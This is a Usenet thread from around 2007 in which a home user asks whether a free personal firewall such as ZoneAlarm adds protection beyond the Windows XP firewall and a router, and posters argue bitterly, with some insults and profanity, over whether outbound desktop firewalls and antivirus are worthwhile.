Is a software firewall such as Zone Alarm essential for added
protection if I am already using the XP firewall, AVG antivirus (free)
and have a wired router (D-link-524)? Will it offer me any additional
protection? If so, is there a better free firewall than Zone alarm?
Thanks.
Dickie Peters wrote:
> Is a software firewall such as Zone Alarm essential for added
> protection if I am already using the XP firewall, AVG antivirus (free)
> and have a wired router (D-link-524)? Will it offer me any additional
> protection? If so, is there a better free firewall than Zone alarm?
>
> Thanks.
Xp fw only protects you from incoming packets. You are already covered from
these if you have a router with Stateful Packet Instpection (SPI) or Network
Address Translation (NAT). However neither will protect outgoing packets on an
application basis.
An anti-virus (AV) itself doesn't have anything to do with a PFW although some
suites include an AV and a PFW.
There are several free PFWs out there. Which one is best will usually get you a
rant or rave that rivals religious dogma. All the PFWs I've seen do the same
thing. How they do it is where they differ. For example; Kerio is very detailed
and allows you to alter every rule while Zone Alarm is more user friendly put
not as powerful. Another PFW that many like is an old version of Sygate (before
they were bought by Semantec).
I always have a third party Private FireWall (PFW) and either a router with some
kind of firewall or XP's FW.
For the end-users I suggest Zone-Alarm or what ever commercial PFW they already
have. Someone with a techie attitude will appreciate Kerio more.
Dickie Peters
> Is a software firewall such as Zone Alarm essential for added
> protection if I am already using the XP firewall, AVG antivirus (free)
> and have a wired router (D-link-524)? Will it offer me any additional
> protection?
No. See my answer in c.s.f. F'up2there.
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
Super Lemon
> However neither will protect outgoing packets on an
> application basis.
And this is not neccessary, because it's useless.
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
Volker Birk wrote:
> Super Lemon
>> However neither will protect outgoing packets on an
>> application basis.
>
> And this is not neccessary, because it's useless.
I mentioned the facts as I know them. Whether or not it is useful in that
instance is a decision that only Dickie can make.
Personally, I would rather know what is going in or out of my computer. But then
Microsoft says it isn't "my computer".
>
> Yours,
> VB.
Post removed (X-No-Archive: yes)
>
>For the end-users I suggest Zone-Alarm or what ever commercial PFW they already
>have. Someone with a techie attitude will appreciate Kerio more.
If I install ZA, should I disengage XP's firewall?
Ok, apparently my initial post has caused some debate here. I posted
here because you know much more than I do, so let me clarify my
question.
Like everyone else, I want to prevent any hackers from attacking my
machine. I want to block those attacks, but at the same time I would
like to prevent anything that should not be on my computer, such as
malware, from sending out my personal information or whatever.
Being on disability, I cannot afford a lot of expensive software. With
that, can someone offer me the basics of what I should have installed
to offer me as much protection, both incoming and outgoing, as
possible? My OS is XP if that helps.
Thanks in advance for your help.
Dickie
Dickie Peters
> >
> >For the end-users I suggest Zone-Alarm or what ever commercial PFW they already
> >have. Someone with a techie attitude will appreciate Kerio more.
>
> If I install ZA, should I disengage XP's firewall?
ZA's installer may/should actually do that for you. After
installing, check.
--
Todd H.
http://www.toddh.net/
Dickie Peters
> If I install ZA, should I disengage XP's firewall?
No. You should enable XP's Windows-Firewall, and drop Zone Alarm.
> I want to block those attacks, but at the same time I would
> like to prevent anything that should not be on my computer, such as
> malware, from sending out my personal information or whatever.
This will not work. If you're interested, why this is advertizing
nonsense, please read the discussions we had here. If you have questions
on this topic, feel free to ask.
> Being on disability, I cannot afford a lot of expensive software.
Why are you using Windows then after all? Why not Free Software like
FreeBSD or Ubuntu Linux, for example?
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
Post removed (X-No-Archive: yes)
In article
Juergen Nieveler
> Super Lemon
>
> > Xp fw only protects you from incoming packets.
>
> Just like any other software packet filter running on the same machine.
>
> If the malware is active on your machine, it can deactivate any
> "Desktop Firewall".
And burglars can pick locks, so there's no point in locking your door.
--
Barry Margolin, barmar@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
*** PLEASE don't copy me on replies, I'll read them in the group ***
Juergen Nieveler wrote:
> Super Lemon
>
>> Xp fw only protects you from incoming packets.
>
> Just like any other software packet filter running on the same machine.
>
> If the malware is active on your machine, it can deactivate any
> "Desktop Firewall".
No question malware can do to a firewall what it can do to an Anti-Vius.
Do you keep your door unlocked because the system can be subverted?
>
> Juergen Nieveler
Dickie Peters wrote:
>> For the end-users I suggest Zone-Alarm or what ever commercial PFW they already
>> have. Someone with a techie attitude will appreciate Kerio more.
>
> If I install ZA, should I disengage XP's firewall?
I thought I answered that. Sorry.
Yes.
What I was trying to say before was that XP's firewall is more rudimentary than
ZA and isn't needed if you have ZA. Especially if you have a firewall/router on
your machine which I think any broadband user should.
> Ok, apparently my initial post has caused some debate here. I posted
> here because you know much more than I do, so let me clarify my
> question.
Any kind of question about what software is best will result in a chevy/ford
type debate. I've seen too many debates get so hot they weren't debates any more.
> Like everyone else, I want to prevent any hackers from attacking my
> machine. I want to block those attacks, but at the same time I would
> like to prevent anything that should not be on my computer, such as
> malware, from sending out my personal information or whatever.
Be aware that there is no "silver bullet". You are not going to solve all
security problems with one or two programs/OSes/hardware. Keep up to date with
the latest threats and be prepared for the worst. Backup any essential data and
be ready to reinstall all your software from scratch.
All firewalls can be pierced, all software-based protection can be turned-off,
and all humans can be tricked sometimes.
>
> Being on disability, I cannot afford a lot of expensive software. With
> that, can someone offer me the basics of what I should have installed
> to offer me as much protection, both incoming and outgoing, as
> possible? My OS is XP if that helps.
http://www.geekstogo.com/forum/Free_Antivirus_Antispyware_Re sources-t38.html
http://lists.thedatalist.com/ - get it quick, it will no longer be updated
1. Choose one residential (runs in the background)
2. Get as many on-demand scanners as you can.
Be sure to include root-kit scanners!
3. Get some tools and information to hardening your XP installation
eric howes "enough is enough" to harden IE
http://www.spywarewarrior.com/uiuc/
aaron margosis "run as admin" to harden your login
http://blogs.msdn.com/aaron_margosis/
archive/2005/04/18/TableOfContents.aspx
http://tinyurl.com/ge7f2
use Steve Gibson's various tools to turn-off insecure features in Windows
http://www.grc.com/freepopular.htm
4. Be ready with free online scanners
5. If you want to be technical get HighJackThis and have a few sites ready to
analyze the logs for you.
www.majorgeeks.com/download3155.html
6. keep up-to-date with what's out there
grc.com (their newsgoups are great)
isc.sans.org/diary.html
secunia.com
>
> Thanks in advance for your help.
> Dickie
Post removed (X-No-Archive: yes)
B. Nice wrote:
> On Tue, 23 Jan 2007 04:37:57 GMT, Super Lemon
> wrote:
>
>> What I was trying to say before was that XP's firewall is more rudimentary than
>> ZA and isn't needed if you have ZA.
>
> "More rudimentary"? - What exactly do you base that statement on?
>
> The XP firewall does exactly what it claims to do. It is non-intrusive
> and (contrary to most 3rd party firewalls) provides true
> boottime-protection. That it does'nt provide features like "outbound
> protection" does'nt make it rudimentary if that is what you are
> referring to.
So you think I used the wrong word. Sorry.
What word do you think I should use when one product does not provide a desired
service that another does?
You don't seem to think the service is needed. Fair enough. We do seem to
disagree on this point. It is a service that has been useful to me. I do want to
know what goes on in my computer.
You mention three very good technical concerns; boot time control, packet
filtering, and intrusive FWs. I have found web sites that claim all PFWs I know
of to be low enough to provide boot-time protection. If you are behind a router
(Siemens Speedstream in my case) handles SPI why would I need a software packet
filter? As far as intrusiveness. Yes they were once bad but they are all
getting better. And to compare them to CSI is absurd since CSI doesn't even
provide the service that causes that intrusiveness.
No, Microsoft didn't lie about it's impotency (is that an ok word?). In fact,
lets give credit where credit is due and acknowledge that this is one case where
Microsoft didn't make a gross overstatement that bordered on a lie.
If I read the OP correctly, our arguments should be about whether ZA has a
service that CSI doesn't which implies the question "this service is needed or
not"? What to call a product that apparently lacks that service is another debate.
Please get your arguments straight in your head before you engage your fingers.
Excuse me while I add another worm to the opened can. I see a real need to have
a third party program keeping Windows at bay. Using Microsoft's FW it is like
letting the fox guard the hen house.
B. Nice wrote:
> > On Tue, 23 Jan 2007 04:37:57 GMT, Super Lemon
> > wrote:
> >
>> >> What I was trying to say before was that XP's firewall is more rudimentary
than
>> >> ZA and isn't needed if you have ZA.
> >
> > "More rudimentary"? - What exactly do you base that statement on?
> >
> > The XP firewall does exactly what it claims to do. It is non-intrusive
> > and (contrary to most 3rd party firewalls) provides true
> > boottime-protection. That it does'nt provide features like "outbound
> > protection" doesn't make it rudimentary if that is what you are
> > referring to.
So you think I used the wrong word. Sorry.
What word do you think I should use when one product does not provide a desired
service that another does?
You don't seem to think the service is needed. Fair enough. We do seem to
disagree on this point. It is a service that has been useful to me. I do want to
know what goes on in my computer.
You mention three very good concerns; boot time control, packet
filtering, and intrusive FWs. I have found several web sites that claim PFWs
(all that I know of) are low enough to provide boot-time protection. If you are
behind a router (Siemens Speedstream in my case) handles SPI why would you need
a software packet filter? As far as intrusiveness. Yes most PFWs were once bad
but they are all getting better. To compare them to CSI is absurd since CSI
doesn't even provide the service that causes that intrusiveness.
No, Microsoft didn't lie about it's impotency (is that an ok word?). In fact,
lets give credit where credit is due and acknowledge that this is one case where
Microsoft didn't make a gross overstatement that bordered on a lie.
If I read the OP correctly, our arguments should be about whether ZA has a
service that CSI doesn't which implies the question "is this service needed or
not"? What you call a product that lacks that service is another debate.
Please get your arguments straight in your head before you engage your fingers.
Excuse me while I add another worm to the opened can. I see a real need to have
a third party program keeping Windows at bay. Using Microsoft's FW it is like
letting the fox guard the hen house.
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Juergen Nieveler wrote:
> Super Lemon
>
> > Xp fw only protects you from incoming packets.
>
> Just like any other software packet filter running on the same machine.
>
> If the malware is active on your machine, it can deactivate any
> "Desktop Firewall".
Sorry, all this "outgoing traffic checking with desktop firewalls is
useless or detrimental" is *plain bullshit*.
Yes, a *well written* malware already installed on the PC *COULD*
deactivate any desktop firewall, but by not using such a firewall you
open the door even to *simpler malware written by kids* ...
That objection excepted against desktop firewalls applies exactly to
antivirus software, too.
The "strange" thing is that nobody goes around blabbing about
"antivirus software is useless"! :-D
Admitting that a well-written malicious application could circumvent
security software is no excuse for taking any care at all (yes, there
is the additional "false sense of security" bullshit, when the
expression is inappropriately used ...).
Moreover, using a (real) desktop firewall allows you to be alerted when
not-malware applications try to connect with outside, letting you the
option to deny this (you can think at many circumstances for it, some
legitimate, some much less but ...).
My advice: turn off the much-limited Windows XP SP2 firewall and
install a good desktop firewall.
ZoneAlarm is quite easy to configure and use and in recent releases I
haven't found any incompatibility with any other software nor any
detectable loss in performances.
Maybe other desktop firewalls, like Kerio or Sygate, could be as much
as good or even better.
freesailor
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> freesailor wrote:
>
> > Juergen Nieveler wrote:
> >> Super Lemon
> >>
> >>> Xp fw only protects you from incoming packets.
> >>
> >> Just like any other software packet filter running on the same machine.
> >>
> >> If the malware is active on your machine, it can deactivate any
> >> "Desktop Firewall".
> >
> > Sorry, all this "outgoing traffic checking with desktop firewalls is
> > useless or detrimental" is *plain bullshit*.
> >
> > Yes, a *well written* malware already installed on the PC *COULD*
> > deactivate any desktop firewall, but by not using such a firewall you
> > open the door even to *simpler malware written by kids* ...
>
> Now you're really showing what's really plain bullshit.
>
> > The "strange" thing is that nobody goes around blabbing about
> > "antivirus software is useless"! :-D
>
> Oh, I do.
Which tells you pretty much all you need to know about how heavily to
weigh Sebastian's views when it comes to managaging risk on a home or
business PC that lacks a user of utmost care and paranoia. Or
Openbsd.
--
Todd H.
http://www.toddh.net/
Post removed (X-No-Archive: yes)
Sebastian Gottschalk wrote:
> freesailor wrote:
>
> > Juergen Nieveler wrote:
> >> Super Lemon
> >>
> >>> Xp fw only protects you from incoming packets.
> >>
> >> Just like any other software packet filter running on the same machine.
> >>
> >> If the malware is active on your machine, it can deactivate any
> >> "Desktop Firewall".
> >
> > Sorry, all this "outgoing traffic checking with desktop firewalls is
> > useless or detrimental" is *plain bullshit*.
> >
> > Yes, a *well written* malware already installed on the PC *COULD*
> > deactivate any desktop firewall, but by not using such a firewall you
> > open the door even to *simpler malware written by kids* ...
>
> Now you're really showing what's really plain bullshit.
ROTFL!
>
> > The "strange" thing is that nobody goes around blabbing about
> > "antivirus software is useless"! :-D
>
> Oh, I do.
Well, I've guessed it ... ;-)
>
> > Admitting that a well-written malicious application could circumvent
> > security software is no excuse for taking any care at all
>
> And you're twisting "taking care" with "installing pseudo-security stuff".
LOL!
Just the second usual "false sense of security" bullshit I was talking
about! :-D
>
> > Moreover, using a (real) desktop firewall allows you to be alerted when
> > not-malware applications try to connect with outside, letting you the
> > option to deny this (you can think at many circumstances for it, some
> > legitimate, some much less but ...).
>
> I fail to see any. Please enlighten my.
For example, stopping any program that insists "calling home" just at
the first run, sometimes even before you have the chance to uncheck the
"connect for updates" option (if there is any ...).
It's a basic privacy safeguard, quite surprised to have to mention it
here ...
>
> > My advice: turn off the much-limited Windows XP SP2 firewall and
> > install a good desktop firewall.
>
> Such a thing doesn't exist.
ROTFL!
>
> > ZoneAlarm is quite easy to configure and use and in recent releases I
> > haven't found any incompatibility with any other software nor any
> > detectable loss in performances.
>
> Except that it fucks up the system?
>
> > Maybe other desktop firewalls, like Kerio or Sygate, could be as much
> > as good or even better.
>
> In fucking up the system? Indeed!
So, you are spreading your "truth" just on the base of your previous
personal bad experiences (and not with security issues but with system
issues!)?
Well, I'm sorry for you, but this is hardly a "good security policy" to
share here ...
I had to repeat it: I use ZoneAlarm since version 3.x (it was many
years ago). Only time I had some trouble was with a very old version
that had problems with Norton Antivirus (this is just one of the
reasons why I gave up with Norton and choose a less intrusive
antivirus, living happy since then ...).
By the way, speaking about "security policies", could you explain in
detail to us your beliefs about antivirus software?
That way, maybe we all could learn something new and interesting.
Maybe ... ;-)
freesailor
Sebastian Gottschalk wrote:
> Todd H. wrote:
> > Which tells you pretty much all you need to know about how heavily to
> > weigh Sebastian's views when it comes to managaging risk on a home or
> > business PC that lacks a user of utmost care and paranoia.
>
> > Or Openbsd.
>
> I'm running FreeBSD. With Xgl and fat GNOME. And the last lines of my ipfw
> ruleset are: allow tcp,udp,esp,ah from any to any; deny ip from any to any
> (icmp with some specific types was allowed earlier)
So, you are "safe" just because you use an almost neglected (especially
from virus and malware writers) platform?
Fantastic suggestion, I hope you don't feel offended if I said this is
one of the least useful and "real-world" security advice I've heard ...
I fully agree with you that user's behaviour is the most important line
of defense against viruses and malware, but if you are suggesting
that's just enough, you are deceiving yourself, even before trying (in
fully good faith) to mislead all of us ...
freesailor
PS: I'm not at all a Windows fan nor a Unix/Linux basher, I just try to
give well-advised and practical suggestions, not useless advices ...
PS2: believe or not, my PC's have been "infected" just one time in my
personal life and in my working career, just when I switched off
ZoneAlarm into network environments I foolishly believed they were safe
enough (they weren't ... ;-)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> freesailor wrote:
>
> >>> deactivate any desktop firewall, but by not using such a firewall you
> >>> open the door even to *simpler malware written by kids* ...
> >>
> >> Now you're really showing what's really plain bullshit.
> >
> > ROTFL!
>
> Must be so ROFTL that my system is trivially secure without running any
> such "firewall" and would most likely suffer from newly introduced
> vulnerabilities when installing such a thing.
Well, yes, because you're not running windows.
Windows as we all know is a bit more prone to nastyware, and hence
benefits from adornments such as av and "desktop firewall" software
while such things aren't even available for less sieve like
platforms. Not necessary for a savvy careful user, but part of most
organization's risk management plan where they don't have the benefit
of 100% savvy careful users.
And these desktop firewall programs do add value there.
> But please, just state how such "simpler malware" could successfully
> exploited a fully patched Windows XP SP2 in standard configuration.
Oh, how bout the day after the next 0day exploit is released for it,
and before the update cycle?
Sebastian Gottschalk wrote:
> freesailor wrote:
>
> >>> deactivate any desktop firewall, but by not using such a firewall you
> >>> open the door even to *simpler malware written by kids* ...
> >>
> >> Now you're really showing what's really plain bullshit.
> >
> > ROTFL!
>
> Must be so ROFTL that my system is trivially secure without running any
> such "firewall" and would most likely suffer from newly introduced
> vulnerabilities when installing such a thing.
Sure, if you install just application written by you, you'll be even
safer ...
>
> But please, just state how such "simpler malware" could successfully
> exploited a fully patched Windows XP SP2 in standard configuration.
What?
Windows does nothing to prevent malware sending data outside (even
having a so-called "native desktop firewall"), do you believe it can
stop malware installing and running too? :-O
>
> >>> Admitting that a well-written malicious application could circumvent
> >>> security software is no excuse for taking any care at all
> >>
> >> And you're twisting "taking care" with "installing pseudo-security stuff".
> >
> > LOL!
> > Just the second usual "false sense of security" bullshit I was talking
> > about!
>
> I wonder... are you talking to a mirror? It seems like you have a problem
> with logic thinking.
Same thing I'm sure about you, now.
>
> After all, taking care involves nothing more than sane operation. I fail to
> see why one should install any additional software. What threats should it
> protect against, and why should they not trivially be addressed without
> such software? Enlighten me.
You seems to live outside this world, at least outside of
"Windows-using real-world" ...
>
> >>> Moreover, using a (real) desktop firewall allows you to be alerted when
> >>> not-malware applications try to connect with outside, letting you the
> >>> option to deny this (you can think at many circumstances for it, some
> >>> legitimate, some much less but ...).
> >>
> >> I fail to see any. Please enlighten my.
> >
> > For example, stopping any program that insists "calling home" just at
> > the first run,
>
> Doesn't work, for obvious reasons.
It works everyday.
Didn't you noticed I'm talking about not-malware applications in this
case?
Maybe you aren't aware of this, but there is a lot of not-malware
applications around (many of those wants to "call home") ... ;-)
>
> > sometimes even before you have the chance to uncheck the
> > "connect for updates" option (if there is any ...).
>
> Can you provide an example of a legitimate or pseudo-legitimate program
> behaving in such a way? I guess you can't, because such programs don't
> exist.
>
> > It's a basic privacy safeguard, quite surprised to have to mention it
> > here ...
>
> It's no safeguard, so I wonder why you wonder that such a thing has to be
> mentioned somehow.
I repeat: you are leaving in a world apart.
Not just a paranoic, but a childish world, too ...
>
>
> >>> My advice: turn off the much-limited Windows XP SP2 firewall and
> >>> install a good desktop firewall.
> >>
> >> Such a thing doesn't exist.
> >
> > ROTFL!
>
> Ah... any argument here? Just give me an example of a program that would
> normally qualify as a "desktop firewall" which is not trivially vulnerable
> to various DoS conditions, doesn't introduce any known non-DoS
> vulnerabilities and provides an adequate protection against threats that
> justifies the introduced complexity.
Complexity? What complexity?
It seems you don't know what you are talking about ...
>
> > I had to repeat it: I use ZoneAlarm since version 3.x (it was many
> > years ago). Only time I had some trouble was with a very old version
> > that had problems with Norton Antivirus (this is just one of the
> > reasons why I gave up with Norton and choose a less intrusive
> > antivirus, living happy since then ...).
>
> And I repeat: I never used any "personal firewall" or "virus scanners". And
> I never had any problems at all.
So, now it's clear: you REALLY don't know what you are talking about!
This explains a lot, thanks for the admission.
> Well, I believe that various vendors have a political agenda. F.E. McAfee
> detects the well known port scanner Nmap as riskware with various bogus
> claims, but their own port scanner doesn't get detected beside the same
> bogus claims would hold.
> But I think most people would agree on that.
Maybe you're right, maybe you're just paranoid (just like people saying
antivirus companies are virus makers).
Your paranoia could be acceptable just if there weren't many
independent companies and you can always make cross-checks (the simpler
"technique" is to use an on-line antivirus and a different one off-line
and double scan every downloaded software).
>
> No, I guess you couldn't. Since you obviously like to ignore how the
> technology actually works.
Just one thing is sure: you ignore how the real world goes on.
In practice, you are saying: seat belts don't give you full security
(true), so don't fasten seat belts.
Quite useful and well-though approach ... :-D
freesailor
Post removed (X-No-Archive: yes)
Sebastian Gottschalk wrote:
> freesailor wrote:
>
> > Sebastian Gottschalk wrote:
> >> Todd H. wrote:
> >>> Which tells you pretty much all you need to know about how heavily to
> >>> weigh Sebastian's views when it comes to managaging risk on a home or
> >>> business PC that lacks a user of utmost care and paranoia.
> >>
> >>> Or Openbsd.
> >>
> >> I'm running FreeBSD. With Xgl and fat GNOME. And the last lines of my ipfw
> >> ruleset are: allow tcp,udp,esp,ah from any to any; deny ip from any to any
> >> (icmp with some specific types was allowed earlier)
> >
> > So, you are "safe" just because you use an almost neglected (especially
> > from virus and malware writers) platform?
>
> No. My other machine runs Windows.
The machine messed up by your Zone Alarm, I suppose ... :-)
>
> > Fantastic suggestion, I hope you don't feel offended if I said this is
> > one of the least useful and "real-world" security advice I've heard ...
>
> Wrong again. Using an easy to use and generally safe OS is an often stated
> and very good advice.
Just if you can choose your personal OS on your home machine
*and*
you are enough skilled
*and*
you are security aware
*and*
you want to accept having one thousand less application available.
It seems to me you'll never worked in real-world companies, with
real-world users, at least.
>
> > I fully agree with you that user's behaviour is the most important line
> > of defense against viruses and malware,
>
> > but if you are suggesting
> > that's just enough, you are deceiving yourself, even before trying (in
> > fully good faith) to mislead all of us ...
>
> Aside from trivial implications like not using vulnerable software,
> estimating trustworthyness and conclusive thinking, what exactly would be
> needed more? Any especially: why? Provide some scenarios, and I'll hopely
> (reads: with ease) debunk them.
Read just my comment above.
If you really know reald-world scenarios you will be able to debunk
them.
I doubt that ...
>
> > PS2: believe or not, my PC's have been "infected" just one time in my
> > personal life and in my working career, just when I switched off
> > ZoneAlarm into network environments I foolishly believed they were safe
> > enough (they weren't ... ;-)
>
> Seems like you have a big problem. After all, a firewall concept (that you
> don't have)
:-D
> involves host security as well. And so, if the host would be
> vulnerable without the "firewall", it also trivially is with the "firewall"
> in place.
Not so trivially as you believe.
It would be by following your "suggestions" that attacks would be
really trivial ...
Frankly speaking, I hope no one gives ear to you, if "false secutity"
is bad, listening to in-a-daze security "experts" is even worst ...
freesailor
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk wrote:
> freesailor wrote:
> > What?
> > Windows does nothing to prevent malware sending data outside (even
> > having a so-called "native desktop firewall"),
>
> I simply don't execute any malware. Now, that was easy.
So, you are every time sure it's not a malware.
As I'll say later, you are a genious or ...
>
> > do you believe it can stop malware installing and running too? :-O
>
> Why should it stop something that can't even happen? How should malware get
> executed automatically and without my consent? I'm not using any program in
> any configuration which would allow such an insanely stupid thing.
So, you perfectly know how every programs behave.
As I'll say later, you are a genious or ...
> And, again, I fail to see your argument. If the malware got executed,
> you're hosed. It will simply bypass you "firewall" and do whatever it wants
> to do.
So, you are ready to *trust* every program you make running without
using any security software, because you are *sure* it behaves well
*and*
at the same time you are *sure* that every malware is able to easily
circumvent any security software?
My God, this is one of the strangest "reasoning" I ran across!
Quite worrying ... :-(
>
> >> After all, taking care involves nothing more than sane operation. I fail to
> >> see why one should install any additional software. What threats should it
> >> protect against, and why should they not trivially be addressed without
> >> such software? Enlighten me.
> >
> > You seems to live outside this world, at least outside of
> > "Windows-using real-world" ...
>
> I still wonder if you can give just one example. Because, the default
> assumption is that no such threat exists.
So, you didn't read my comment and/or you are fully unable to
understand that enterprise users can't act as skilled and
security-aware home users.
If you can't understand that, you'll keep on giving worthless advices.
> >>> For example, stopping any program that insists "calling home" just at
> >>> the first run,
> >>
> >> Doesn't work, for obvious reasons.
> >
> > It works everyday.
> > Didn't you noticed I'm talking about not-malware applications in this
> > case?
>
> No, I didn't. But then, it's totally superfluos.
Oh, yes, tell us why! ... :-D
>
> > Maybe you aren't aware of this, but there is a lot of not-malware
> > applications around (many of those wants to "call home")
>
> There is no not-malware application trying to "call home". Actually
> competent people are aware that this is a big hype around technical
> incompetence, and no such claim ever turned out to be serious. Or can you
> provide any example?
Sure: Real Player just after installing it, for example.
I really don't like any program that tries to connect to its servers
without asking it to me explicitely, just because that's the marketing
choice of its maker, just like I hate programs that install themselves
at startup without asking for my permission.
Moreover, even when "uncheck internet call" is available on the program
panel you could misconfigure or forget to configure it: using a desktop
firewall avoid that (surprising, isn't it? ;-)
>
> >> Ah... any argument here? Just give me an example of a program that would
> >> normally qualify as a "desktop firewall" which is not trivially vulnerable
> >> to various DoS conditions, doesn't introduce any known non-DoS
> >> vulnerabilities and provides an adequate protection against threats that
> >> justifies the introduced complexity.
> >
> > Complexity? What complexity?
>
> Eh... 3 MB of code with 300+ KB for an NDIS hook, hooking 200+ usermode
> functions and sometimes even kernel functions... for a typical PFW...
> certainly is an enormous amount of complexity added to the system.
Office software (especially Windows office software) is much more
complex and even more bound to OS internals.
So I suppose you just use Notepad and similar tools every time you need
to write a document ...
>
> > It seems you don't know what you are talking about ...
>
> Or you don't. From the figures above, I'd just estimate about 100+
> vulnerabilities and 1000+ deadlock conditions added to the system. Now, how
> can you justify this?
If you "estimate" 100+ vulnerabilities just looking at program size,
there are just two cases:
1) you are a genius
2) you are ... well ...
Frankly speaking, it seems to me you are *NOT* a genius, so ... :-)
>
> I rest my case. This is too obvious.
You have the ability of considering obvious what's not, and vice
versa!
>
> Hm... your claim was that your never had any problem with this software,
> and therefore is a necessity.
Not at all, never said that.
I just said that is *BETTER* having it rather not having.
Especially for a not security-aware user.
> I easily debunked this with showing that the
> same can be trivially achieved with this software, therefore proving that
> it's not any necessity.
In fact, it's not a necessity, just good practice.
>
> And the default assumption is that less software is better, due to
> complexity. Thus, my argument wins.
Your argument could (hardly) be good for you, not for zillions of users
in the world.
(BTW, why you need a Windows machine, too? ;-)
>
> Maybe you should look up what "riskware" means and why you cross-check
> arguments doesn't even partially apply here.
No?
It applies perfectly, the fact is you are just unable to retort.
BTW: I was afraid you would go further with "conspiration theories"
about general antivirus companies compliciy and the like, happy not
having seen that (at least for now ... ;-)
>
> > Just one thing is sure: you ignore how the real world goes on.
> > In practice, you are saying: seat belts don't give you full security
> > (true), so don't fasten seat belts.
>
> In practice, this shows how much you're lacking logic thinking.
>
> Seat belts won't make you make vulnerable to car crashs, and neither does
> full security exist in analogue world. That's why your analogy is bullshit.
Even desktop firewalls won't make you more vulnerable: it's just your
belief, based on the strange assumption that they add *more*
vulnerability than they in fact *stop* and/or the mere *possibility*
they contain malware.
And, by the way, contrarily to what you said even seat belts can make
you *more* vulnerable to car crashes (the most cited case is the car
falling into a canal full of water), nevertheless the good advice
(being bad just in one case on many thousand car crashes) is to fasten
them.
So, you can see how easy for me is to show clearly that is YOU the one
who lacks logic thinking ... :-)
freesailor
Post removed (X-No-Archive: yes)
Sebastian Gottschalk wrote:
> freesailor wrote:
> > Read just my comment above.
> > If you really know reald-world scenarios you will be able to debunk
> > them.
>
> You failed to show me any such scenario.
Since this seems to be your desperate line of defense, I'll just cite
you a few words:
- enterprise (usually Windows) environment
- not well-timed security updates
- not skilled and/or "controlled" users
- no system-level application manager (like Safeboot) used in the
company (but I think you have to hate even system-level application
managers, surely they are no less intrusive and complex than desktop
firewalls ...)
You have A LOT of similar situations in real world, and in any case, a
personal firewall is useful, not harmful.
I hope I'll not have to explain more ...
> I really wonder, since running a
> Windows box safely really isn't anything special or mysterious.
Oh, yes, for you and me at home ...
>
> >> involves host security as well. And so, if the host would be
> >> vulnerable without the "firewall", it also trivially is with the "firewall"
> >> in place.
> >
> > Not so trivially as you believe.
>
> Yes, as trivially as I believe. And you even gave a wonderful
> demonstration.
:-)
>
> > It would be by following your "suggestions" that attacks would be
> > really trivial ...
>
> If you're running some vulnerable software or utilize some vulnerable
> program: Indeed.
Ok, we all ever will ask you for what is vulnerable and what isn't ...
:-D
>
>
> > Frankly speaking, I hope no one gives ear to you,
>
> I'm confident that the same definitely applies to you. After all, your
> suggestions could be summarized as "keep on being stupid, install this
> known crappy software and rely on it to no end, and keep the rest of your
> system as insecure as possible".
No, my suggestion is just: using security software is better than using
no security software, 999 times on 1000, especially if you are not so
skilled in security.
BTW, did I mention that desktop firewalls, antivirus and similar
software can check for email malicious attachments, in some cases
directly renaming "dangerous extensions", so preventing users mistaken
clicks?
The difference between me and you is that I advice using software that
does that, you suggests relying just on users being security-aware (!).
The real world said that users misbehaving with email attachments is
one of the more usual way to spread visuses an malware, so tha real
world is saying (again) that you are plainly WRONG ...
freesailor
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
news:51n9glF1jhp8gU1@mid.dfncis.de:
>
>
>> No, my suggestion is just: using security software is better than
>> using no security software, 999 times on 1000, especially if you are
>> not so skilled in security.
>
> And you fail to qualify this obviously bogus claim.
>
>> BTW, did I mention that desktop firewalls, antivirus and similar
>> software can check for email malicious attachments, in some cases
>> directly renaming "dangerous extensions", so preventing users
>> mistaken clicks?
>
> Since when does opening an email attachment execute any programs?
> Since when would a sane user execute such programs? Which sane
> administrator would allow his users to run any programs?
Well, let's see, OE used to automatically execute HTML contnet when e-mail
was viewed in the preview pane. (I would think that was fixed by now.)
Sebastian Gottschalk
news:51n0g0F1k8uh1U1@mid.dfncis.de:
>> Well, yes, because you're not running windows.
>
> This is especially true for Windows, since all those "desktop
> firewalls" for Windows are totally broken.
I don't know why you keep saying that.
Maybe you're like my son, who choked on a taco shell when he was 3. To
this day, he'll be 18 in Feb., he won't eat hard shell tacos.
Maybe you had one bad experience with ZoneAlarm v1.0, or something
similar, eons ago and can not accept that anyhting may have fixed.
So v1.0 8 yrs ago messed up something in your little Win98 box....boo hoo
hoo. Get over it.
> Weighing benefit against problems usually isn't the driving point for
> most organizations. Insurance companies demanding to add such a stuff
> (without even understanding the technical implications) usually is.
> The admin generally complains.
>
> The more competent organizations who don't live in such bounds
> generally don't adhere to "desktop firewalls" and hardly adhere to
> virus scanners. They simply utilize competent and serious security
> mechanisms like No-Exec-Policies, competent management of ACLs and
> other security policies, NIDS...
Are you serious ?! How many organizations have you toured the IT
department and were told...'We use no AV here' ?
>>> But please, just state how such "simpler malware" could successfully
>>> exploited a fully patched Windows XP SP2 in standard configuration.
>>
>> Oh, how bout the day after the next 0day exploit is released for it,
>> and before the update cycle?
>
> A 0day exploit for what program or subsystem?
It doesn't matter what OS. The O/S in question is Windows XP.
I've got more questions....I'll ask them all in this post.
1) How do you install a Windows program, then configure it w/o starting
the program ?
2) What was the file xxxxx.xxxx.crack.exe doing in a zip file you had.
According to you, you would not ever trust any program you had not
written (it seems), and I think any program named crack.exe would be
something not written by you, and should NOT on your computer.
3) How can you say that programs don't try to 'call home'. Automatic
